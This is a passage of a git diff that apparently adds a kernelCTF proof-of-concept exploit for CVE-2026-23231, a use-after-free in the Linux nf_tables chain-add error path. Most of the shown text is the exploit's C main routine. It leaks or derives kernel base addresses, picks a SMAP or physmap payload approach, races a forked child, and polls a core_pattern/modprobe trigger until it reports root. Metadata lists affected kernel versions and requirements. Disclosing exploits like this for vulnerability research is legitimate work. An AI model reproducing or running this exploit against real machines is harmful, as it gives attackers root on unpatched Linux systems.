0; + } + + setup_auto_physmap_size(); + + int smap_present = setup_check_smap(); + if (!smap_present) { + printf("[+] SMAP not detected -- using userspace blob\n"); + use_userblob = 1; + } else { + printf("[*] SMAP detected -- using physmap approach\n"); + } + + kbase = env_u64("KBASE"); + phbase = env_u64("PHYSBASE"); + + /* kernelCTF repro with requires_separate_kaslr_leak=true appends + * "nokaslr -- kaslr_leak=1"; init.sh passes the kallsyms text base + * as argv. It does not pass a direct-map base, so derive that from + * nokaslr below. */ + int verifier_trigger_arg = 0; + for (int i = 1; i < argc; i++) { + if (strcmp(argv[i], "--vuln-trigger") == 0) { + verifier_trigger_arg = 1; + continue; + } + if (kbase) + continue; + uint64_t cli_kbase = 0; + if (parse_u64_arg(argv[i], &cli_kbase)) { + if (cli_kbase == 0 && kernel_cmdline_has_token("nokaslr")) { + cli_kbase = KTEXT_SCAN_START; + printf("[*] argv kbase was 0; using nokaslr fallback %#lx\n", + (unsigned long)cli_kbase); + } + kbase = cli_kbase; + printf("[+] argv kbase=%#lx\n", (unsigned long)kbase); + } else { + printf("[!] ignoring unparsable argv kbase: %s\n", argv[i]); + } + } + + if (kernel_cmdline_has_token("nokaslr")) { + if (!kbase) { + kbase = KTEXT_SCAN_START; + printf("[*] nokaslr detected; using fixed kbase=%#lx\n", + (unsigned long)kbase); + } + if (!phbase) { + phbase = DIRECT_MAP_START; + printf("[*] nokaslr detected; using fixed phbase=%#lx\n", + (unsigned long)phbase); + } + } + if (verifier_trigger_arg) { + printf("[*] verifier --vuln-trigger mode enabled\n"); + return vuln_trigger_main(); + } + + if (kbase && phbase) { + n_kbase_cands = 1; + kbase_cands[0] = kbase; + n_phbase_cands = 1; + phbase_cands[0] = phbase; + } + if (use_userblob) { + if (!kbase && !leak_entrybleed()) + return 1; + if (!kbase) { + printf("[-] Entrybleed failed for kbase\n"); + return 1; + } + phbase = 0xffff888000000000ULL; + } else { + if ((!kbase || !phbase) && !leak_entrybleed()) + return 1; + if (!kbase || !phbase) { + fprintf(stderr, "[-] need KBASE and PHYSBASE\n"); + return 1; + } + } + printf("[+] kbase = %#lx\n", (unsigned long)kbase); + printf("[+] phbase = %#lx\n", (unsigned long)phbase); + if (use_userblob) + printf("[+] blob = userspace @ %#lx\n", + (unsigned long)USERBLOB_ADDR); + + setup_payload(); + + pid_t child = fork(); + if (child < 0) die("fork"); + if (child == 0) + _exit(exploit_main()); + + for (int t = 0; t < PARENT_POLL_ITERATIONS; t++) { + // @sleep(desc="poll core_pattern every 2s during race") + sleep_ms(PARENT_POLL_MS); + + if (setup_try_trigger()) { + printf("\n[+] ===== GOT ROOT =====\n"); + kill(child, SIGKILL); + waitpid(child, nullptr, WNOHANG); + return 0; + } + + int status; + pid_t p = waitpid(child, &status, WNOHANG); + if (p > 0) { + printf("[*] child exited (status=%d)\n", + WIFEXITED(status) ? WEXITSTATUS(status) : -1); + for (int i = 0; i < POST_EXIT_POLLS; i++) { + if (setup_try_trigger()) { + printf("\n[+] ===== GOT ROOT =====\n"); + return 0; + } + // @sleep(desc="wait for modprobe handler to execute") + sleep_ms(POST_EXIT_POLL_MS); + } + break; + } + } + + kill(child, SIGKILL); + waitpid(child, nullptr, 0); + + printf("[-] exploit did not achieve root\n"); + return 1; +} diff --git a/pocs/linux/kernelctf/CVE-2026-23231_cos/exploit/cos-113-18244.521.88/target_db.kxdb b/pocs/linux/kernelctf/CVE-2026-23231_cos/exploit/cos-113-18244.521.88/target_db.kxdb new file mode 100644 index 000000000..b47d2547a Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2026-23231_cos/exploit/cos-113-18244.521.88/target_db.kxdb differ diff --git a/pocs/linux/kernelctf/CVE-2026-23231_cos/metadata.json b/pocs/linux/kernelctf/CVE-2026-23231_cos/metadata.json new file mode 100644 index 000000000..1675c49e9 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23231_cos/metadata.json @@ -0,0 +1,32 @@ +{ + "$schema": "https://google.github.io/security-research/kernelctf/metadata.schema.v3.json", + "submission_ids": ["exp449"], + "vulnerability": { + "summary": "Use-after-free in nf_tables_addchain() error path due to missing synchronize_rcu() between nft_chain_del() and nf_tables_chain_destroy()", + "patch_commit": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=71e99ee20fc3f662555118cf1159443250647533", + "cve": "CVE-2026-23231", + "affected_versions": [ + "3.16 - 6.1.164", + "6.2 - 6.6.127", + "6.7 - 6.12.74", + "6.13 - 6.18.13", + "6.19 - 6.19.3" + ], + "requirements": { + "attack_surface": ["userns"], + "capabilities": ["CAP_NET_ADMIN"], + "kernel_config": [ + "CONFIG_NETFILTER", + "CONFIG_NF_TABLES", + "CONFIG_NF_TABLES_INET" + ] + } + }, + "exploits": { + "cos-113-18244.521.88": { + "uses": ["userns"], + "requires_separate_kaslr_leak": true, + "stability_notes": "Probabilistic race. The exploit is submitted with the kernelCTF separate KASLR leak path enabled. In repro this adds nokaslr and passes the kallsyms-derived kernel text base to the exploit when available; if kallsyms is hidden and the argv value is zero, the exploit uses a nokaslr fallback. The exploit uses the fixed nokaslr direct-map base in this mode. The standalone prefetch side-channel leak path remains available outside repro." + } + } +} diff --git a/pocs/linux/kernelctf/CVE-2026-23231_cos/original.tar.gz b/pocs/linux/kernelctf/CVE-2026-23231_cos/original.tar.gz new file mode 100644 index 000000000..05fcd6e35 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2026-23231_cos/original.tar.gz differ